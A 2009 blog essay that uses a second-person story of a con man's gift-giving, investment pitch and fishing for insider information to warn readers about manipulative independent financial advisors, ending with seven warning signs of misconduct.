By the time you’re done shaking hands with the kid, you realize that he’s dad has moved on.  You watch him mingling with other guests working the room like a cowboy in a rodeo, quickly branding the fattened calves for follow up. Than he’s back, telling you a joke about a CEO who signs a contract with the devil. Next comes the debriefing. What do you do? Who do you work for? Where is your office? Before you can say “Pocahontas”, he’s punching your e-mail and cell number into his Smartphone.

A few days later, as you are getting ready to grab a bite to eat, your cell phone rings. “Hey, how’s it going?” says the friendly voice “Who is this?” you answer confused. “It’s the CEO and the devil guy from last week,” he continues without skipping a beat. “Hey, I happened to be in your neighborhood and I’ve got something for you. Do you wanna do lunch? It’s on me.”  “Sure,” you reply, wondering what he can possibly have for you.

During lunch, he goes over more of the same routine. You discover that he either knows some C Executives in your company or knows someone else who does and he hints that he can pull some strings for you. After lunch as you are preparing to leave, he springs a few expensive tickets for some sporting event and tells you that he and his significant other would love to have you and your significant other over in their private booth to watch the game. “Come on, its going to be fun!” A few days later when you come home from work, you discover a few boxes of toys and a bunch of CDs and DVDs on your dining room table.  “What’s this, Honey?” you inquire.  “Mr. CEO/devil’s wife just dropped them off. She said that their kids just love them and she thought ours would too!”

This goes on for several months, with lunches, family get togethers, tickets to see a Broadway show and offers to use his timeshare in Disneyland for free. You eventually let down you guard; clearly these are such nice people.

Then one lunch, your newfound buddy, with an intense look on his face, tells you about this amazing 3-month, double digit return investment opportunity – But you have to act immediately! “How much are we looking at?” you inquire. “Oh, not much,”  he says, “just $100K.”  You politely decline, telling him that you don’t have that kind of money to invest. He says, “can you borrow it from someone?” Sensing a high pressure sales tactic, you say that you don’t feel comfortable borrowing money from people. Your dining companion loosens up and assumes his collegial persona again and says  “Hey, that’s not a problem, I’ll keep my eyes open for other opportunities for you, but I don’t know if they’ll be as good as this one.”

Then the conversation turns to your company and he starts debriefing you about acquisition plans, mergers, strategy, etc. His questions seem strangely reminiscent. Oh yeah, you just recently went over them in the corporate anti-trust and insider information certification course.  Now you realize that he’s actually fishing for insider information.

In a moment of complete mental lucidity, you suddenly get it. This guy is a professional shyster and he’s been playing you like a violin. Now would probably be a good time to end lunch and this relationship. But its not as easy as that. By now, he has woven himself into your social fabric. Severing the relationship now would cause you and your family mental anguish and would probably require some form of unfortunate confrontation. And what about mutual friends; what do you say to them?

And then there is the doubt issue. Even though now you know he’s dishonest and deceitful, shouldn’t you give him a break? After all, he’s just a another guy with a family and a mortgage trying to make a living, isn’t he? So, what do you do?

The moral of the story is that this is all a scam. Don’t let your emotions get the better part of you.  These individuals and their accomplices are cold blooded opportunists. They could care less about you, your family, or your financial well being. Their interest in you is purely financial and short term.  As far as what you perceived to be generosity (the free tickets, lunch, gifts, etc.), they’re just a device to make you feel indebted and emotionally dependent. 

Unfortunately, as many have discovered, few of us are immune from this type of relationship and manipulation. If you think that being scammed financially only applies to fools, check out the Who’s Who on Bernie’s list.

The majority of independent financial advisors\planners operate as one man shows and are not dissimilar to the elixir and snake oil salesmen of the Old West. To compensate for the lack of  breadth and depth of financial knowledge and operational know how, they rent an office at a respectable address, contract with financial service processor like Investors Capital, and purchase an off-the-shelf website that comes pre-loaded with content and functionality like whitepapers, newsletters, and financial calculators. The rest, is pure social engineering.

Despite the aura of legitimacy the financial advisor/planners industry is trying to assume through meaningless certification and NASD regulation, the fact is that it is riddled with dishonest, unscrupulous confidence artists. If you need financial or investment advice, go with a large non-contractor or commission based company like Fidelity. They won’t be able to guarantee double digit returns, but they won’t lose your investment overnight either. If you are new to investing, do yourself a big favor and carefully read the information on the FINRA site. You can also use some of their tools to check out your prospective broker buddy.

Good financial advice is hard to come by. Since most of us are not savvy enough to distinguish between the legitimate advisors and the Madoff wannabes, you should stay away from all independent financial advisors\planners, regardless of how smartly they dress or successful they appear. This especially applies to the ones you know through your social circles.

If you do happen to use an independent financial advisor\planner, you may want to scrub him against the following list of the 7 deadly sins of financial conduct: 

  1. Promising you a high return on your investment (especially ones in the double digit range)
  2. Using a sales pitch to tell you about sudden investment opportunities that require prompt action
  3. Soliciting you for insider information and asking you to act as a reference for other potential investors
  4. Paying you in cash or using proxy accounts (like personal checks from a spouse)
  5. Exhibiting dishonesty of any type (i.e. asking you to attend financial sales meetings masked as social events or having any previous SEC or NASD history of complaints
  6. Showing willingness to spend money on you for no apparent reason (including free lunches, gifts for the kids, etc.)
  7. Having a history of contentious job loss with larger financial institutions and lawsuits or litigation involving trading irregularities

If he fits one or more of these descriptions, it’s probably time for you and your investments to move on.

Caveat Emptor

© Copyright 2009 Yaacov Apelbaum All Rights Reserved.